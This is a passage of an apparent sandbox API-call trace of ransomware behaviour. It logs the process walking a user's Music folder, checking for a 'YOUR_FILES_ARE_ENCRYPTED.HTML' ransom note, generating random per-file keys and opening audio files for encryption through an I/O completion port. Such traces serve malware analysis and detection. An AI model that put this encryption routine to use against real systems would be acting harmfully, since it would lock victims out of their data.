GetProcessHeap () returned 0x600000 [0124.704] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0124.705] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183a06a0, ftCreationTime.dwHighDateTime=0x1d6fb5b, ftLastAccessTime.dwLowDateTime=0x344300f0, ftLastAccessTime.dwHighDateTime=0x1d709a1, ftLastWriteTime.dwLowDateTime=0x344300f0, ftLastWriteTime.dwHighDateTime=0x1d709a1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0xffd95b9f, cFileName="wlctI1KoT", cAlternateFileName="WLCTI1~1")) returned 1 [0124.705] StrStrIW (lpFirst="wlctI1KoT", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.705] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT") returned 61 [0124.706] GetProcessHeap () returned 0x600000 [0124.706] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0124.706] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT" [0124.706] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\*" [0124.706] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183a06a0, ftCreationTime.dwHighDateTime=0x1d6fb5b, ftLastAccessTime.dwLowDateTime=0x344300f0, ftLastAccessTime.dwHighDateTime=0x1d709a1, ftLastWriteTime.dwLowDateTime=0x344300f0, ftLastWriteTime.dwHighDateTime=0x1d709a1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x168845a, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0124.707] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183a06a0, ftCreationTime.dwHighDateTime=0x1d6fb5b, ftLastAccessTime.dwLowDateTime=0x344300f0, ftLastAccessTime.dwHighDateTime=0x1d709a1, ftLastWriteTime.dwLowDateTime=0x344300f0, ftLastWriteTime.dwHighDateTime=0x1d709a1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x168845a, cFileName="..", cAlternateFileName="")) returned 1 [0124.707] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc66e9910, ftCreationTime.dwHighDateTime=0x1d708c7, ftLastAccessTime.dwLowDateTime=0x55351b00, ftLastAccessTime.dwHighDateTime=0x1d709a0, ftLastWriteTime.dwLowDateTime=0x55351b00, ftLastWriteTime.dwHighDateTime=0x1d709a0, nFileSizeHigh=0x0, nFileSizeLow=0xb412, dwReserved0=0x19e94c, dwReserved1=0x168845a, cFileName="3dbK.mp3", cAlternateFileName="")) returned 1 [0124.707] StrStrIW (lpFirst="3dbK.mp3", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.707] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\3dbK.mp3") returned 70 [0124.707] PathFindExtensionW (pszPath="3dbK.mp3") returned=".mp3" [0124.707] lstrlenW (lpString=".mp3") returned 4 [0124.707] PathFindExtensionW (pszPath="3dbK.mp3") returned=".mp3" [0124.707] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0124.707] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\3dbK.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pbc7nvlksqbotxewzv9\\wlcti1kot\\3dbk.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0124.708] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=46098) returned 1 [0124.708] GetProcessHeap () returned 0x600000 [0124.708] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.710] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="69") returned 2 [0124.710] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="F1") returned 2 [0124.710] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="74") returned 2 [0124.710] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="F8") returned 2 [0124.710] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="97") returned 2 [0124.711] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="BB") returned 2 [0124.711] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="E4") returned 2 [0124.711] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="C2") returned 2 [0124.711] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="C1") returned 2 [0124.711] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="90") returned 2 [0124.711] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="AA") returned 2 [0124.711] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="19") returned 2 [0124.711] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="4D") returned 2 [0124.711] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="E4") returned 2 [0124.711] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="02") returned 2 [0124.711] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="8A") returned 2 [0124.711] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="EB") returned 2 [0124.711] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="FA") returned 2 [0124.711] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="F1") returned 2 [0124.711] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="E3") returned 2 [0124.711] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="87") returned 2 [0124.711] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="CA") returned 2 [0124.711] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="0D") returned 2 [0124.711] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="12") returned 2 [0124.711] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="D7") returned 2 [0124.711] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="7D") returned 2 [0124.711] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="CA") returned 2 [0124.711] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="52") returned 2 [0124.711] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="37") returned 2 [0124.711] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="8C") returned 2 [0124.711] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="2F") returned 2 [0124.711] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="3A") returned 2 [0124.712] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\3dbK.mp3" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\3dbK.mp3") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\3dbK.mp3" [0124.712] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.712] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.716] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23318ec0, ftCreationTime.dwHighDateTime=0x1d6fd36, ftLastAccessTime.dwLowDateTime=0x2a8650c0, ftLastAccessTime.dwHighDateTime=0x1d7024a, ftLastWriteTime.dwLowDateTime=0x2a8650c0, ftLastWriteTime.dwHighDateTime=0x1d7024a, nFileSizeHigh=0x0, nFileSizeLow=0x43e7, dwReserved0=0x19e94c, dwReserved1=0x168845a, cFileName="5ZiFIWN4Em.mp3", cAlternateFileName="5ZIFIW~1.MP3")) returned 1 [0124.716] StrStrIW (lpFirst="5ZiFIWN4Em.mp3", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.716] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\5ZiFIWN4Em.mp3") returned 76 [0124.716] PathFindExtensionW (pszPath="5ZiFIWN4Em.mp3") returned=".mp3" [0124.716] lstrlenW (lpString=".mp3") returned 4 [0124.716] PathFindExtensionW (pszPath="5ZiFIWN4Em.mp3") returned=".mp3" [0124.716] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0124.716] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\5ZiFIWN4Em.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pbc7nvlksqbotxewzv9\\wlcti1kot\\5zifiwn4em.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0124.717] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=17383) returned 1 [0124.717] GetProcessHeap () returned 0x600000 [0124.717] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.720] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="F0") returned 2 [0124.720] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="BC") returned 2 [0124.720] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="C6") returned 2 [0124.720] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="12") returned 2 [0124.720] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="22") returned 2 [0124.720] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="5E") returned 2 [0124.720] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="A2") returned 2 [0124.720] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="BD") returned 2 [0124.720] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="B5") returned 2 [0124.720] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="FD") returned 2 [0124.720] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="07") returned 2 [0124.720] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="82") returned 2 [0124.720] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="FF") returned 2 [0124.720] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="A1") returned 2 [0124.720] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="6B") returned 2 [0124.720] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="AD") returned 2 [0124.720] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="A5") returned 2 [0124.720] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="00") returned 2 [0124.720] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="BE") returned 2 [0124.720] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="FA") returned 2 [0124.720] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="43") returned 2 [0124.720] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="1F") returned 2 [0124.720] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="78") returned 2 [0124.720] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="D9") returned 2 [0124.720] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="AD") returned 2 [0124.720] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="9D") returned 2 [0124.721] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="62") returned 2 [0124.721] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="14") returned 2 [0124.721] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="08") returned 2 [0124.721] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="43") returned 2 [0124.721] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="84") returned 2 [0124.721] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="61") returned 2 [0124.721] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\5ZiFIWN4Em.mp3" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\5ZiFIWN4Em.mp3") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\5ZiFIWN4Em.mp3" [0124.721] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.721] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.725] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8db92df0, ftCreationTime.dwHighDateTime=0x1d6ffc2, ftLastAccessTime.dwLowDateTime=0xb8c85680, ftLastAccessTime.dwHighDateTime=0x1d70a1f, ftLastWriteTime.dwLowDateTime=0xb8c85680, ftLastWriteTime.dwHighDateTime=0x1d70a1f, nFileSizeHigh=0x0, nFileSizeLow=0x9357, dwReserved0=0x19e94c, dwReserved1=0x168845a, cFileName="cR-e0tQ.m4a", cAlternateFileName="")) returned 1 [0124.725] StrStrIW (lpFirst="cR-e0tQ.m4a", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.725] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\cR-e0tQ.m4a") returned 73 [0124.725] PathFindExtensionW (pszPath="cR-e0tQ.m4a") returned=".m4a" [0124.725] lstrlenW (lpString=".m4a") returned 4 [0124.725] PathFindExtensionW (pszPath="cR-e0tQ.m4a") returned=".m4a" [0124.725] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0124.725] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\cR-e0tQ.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pbc7nvlksqbotxewzv9\\wlcti1kot\\cr-e0tq.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0124.726] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=37719) returned 1 [0124.726] GetProcessHeap () returned 0x600000 [0124.726] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.726] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="2E") returned 2 [0124.727] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="BC") returned 2 [0124.727] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="AA") returned 2 [0124.727] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="5E") returned 2 [0124.727] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="7A") returned 2 [0124.727] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="6C") returned 2 [0124.727] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="CA") returned 2 [0124.727] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="26") returned 2 [0124.727] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="E8") returned 2 [0124.727] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="DF") returned 2 [0124.727] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="74") returned 2 [0124.727] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="37") returned 2 [0124.727] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="C1") returned 2 [0124.727] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="C4") returned 2 [0124.727] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="CF") returned 2 [0124.727] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="AF") returned 2 [0124.727] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="B0") returned 2 [0124.730] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="C2") returned 2 [0124.730] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="A0") returned 2 [0124.730] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="8D") returned 2 [0124.730] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="40") returned 2 [0124.730] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="B3") returned 2 [0124.730] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="38") returned 2 [0124.730] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="F2") returned 2 [0124.730] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="D1") returned 2 [0124.730] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="D0") returned 2 [0124.730] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="25") returned 2 [0124.730] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="B6") returned 2 [0124.730] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="CA") returned 2 [0124.730] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="BA") returned 2 [0124.730] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="D8") returned 2 [0124.730] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="2A") returned 2 [0124.731] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\cR-e0tQ.m4a" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\cR-e0tQ.m4a") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\cR-e0tQ.m4a" [0124.731] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.731] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.736] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16bb7230, ftCreationTime.dwHighDateTime=0x1d6fda6, ftLastAccessTime.dwLowDateTime=0x387655b0, ftLastAccessTime.dwHighDateTime=0x1d707c5, ftLastWriteTime.dwLowDateTime=0x387655b0, ftLastWriteTime.dwHighDateTime=0x1d707c5, nFileSizeHigh=0x0, nFileSizeLow=0xb3f2, dwReserved0=0x19e94c, dwReserved1=0x168845a, cFileName="oJ25aEVrgUC1HCFp.mp3", cAlternateFileName="OJ25AE~1.MP3")) returned 1 [0124.736] StrStrIW (lpFirst="oJ25aEVrgUC1HCFp.mp3", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.736] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\oJ25aEVrgUC1HCFp.mp3") returned 82 [0124.736] PathFindExtensionW (pszPath="oJ25aEVrgUC1HCFp.mp3") returned=".mp3" [0124.736] lstrlenW (lpString=".mp3") returned 4 [0124.736] PathFindExtensionW (pszPath="oJ25aEVrgUC1HCFp.mp3") returned=".mp3" [0124.736] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0124.736] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\oJ25aEVrgUC1HCFp.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pbc7nvlksqbotxewzv9\\wlcti1kot\\oj25aevrguc1hcfp.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0124.737] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=46066) returned 1 [0124.737] GetProcessHeap () returned 0x600000 [0124.737] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.738] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="B4") returned 2 [0124.738] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="61") returned 2 [0124.738] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="AA") returned 2 [0124.738] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="DF") returned 2 [0124.738] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="CE") returned 2 [0124.738] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="00") returned 2 [0124.738] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="C7") returned 2 [0124.738] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="0D") returned 2 [0124.738] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="EE") returned 2 [0124.738] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="61") returned 2 [0124.738] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="5F") returned 2 [0124.738] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="5D") returned 2 [0124.738] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="FD") returned 2 [0124.738] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="3F") returned 2 [0124.738] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="9B") returned 2 [0124.738] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="96") returned 2 [0124.738] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="FE") returned 2 [0124.738] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="86") returned 2 [0124.738] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="97") returned 2 [0124.739] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="B0") returned 2 [0124.739] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="05") returned 2 [0124.739] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="69") returned 2 [0124.739] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="A3") returned 2 [0124.739] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="CB") returned 2 [0124.739] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="C0") returned 2 [0124.739] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="62") returned 2 [0124.739] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="14") returned 2 [0124.739] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="C2") returned 2 [0124.739] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="CB") returned 2 [0124.739] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="63") returned 2 [0124.739] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="8C") returned 2 [0124.739] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="3B") returned 2 [0124.740] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\oJ25aEVrgUC1HCFp.mp3" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\oJ25aEVrgUC1HCFp.mp3") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\oJ25aEVrgUC1HCFp.mp3" [0124.740] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.740] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.917] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7d68d00, ftCreationTime.dwHighDateTime=0x1d7001a, ftLastAccessTime.dwLowDateTime=0xe8bff8c0, ftLastAccessTime.dwHighDateTime=0x1d706c8, ftLastWriteTime.dwLowDateTime=0xe8bff8c0, ftLastWriteTime.dwHighDateTime=0x1d706c8, nFileSizeHigh=0x0, nFileSizeLow=0xe0ec, dwReserved0=0x19e94c, dwReserved1=0x168845a, cFileName="RmJ3o4O8WNeKmj6Q.mp3", cAlternateFileName="RMJ3O4~1.MP3")) returned 1 [0124.917] StrStrIW (lpFirst="RmJ3o4O8WNeKmj6Q.mp3", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.917] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\RmJ3o4O8WNeKmj6Q.mp3") returned 82 [0124.917] PathFindExtensionW 